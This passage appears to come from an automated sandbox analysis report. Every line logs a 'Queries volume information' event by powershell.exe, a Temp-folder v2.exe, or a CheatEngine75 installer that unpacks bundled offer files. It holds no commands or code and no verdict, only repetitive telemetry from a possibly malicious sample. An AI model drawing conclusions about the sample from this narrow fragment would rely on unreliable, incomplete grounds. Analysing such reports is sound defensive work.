                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\v2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\logo.png VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\WebAdvisor.png VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\WeatherZero.png VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\RAV_Cross.png VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpQueries volume information: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\finish.png VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
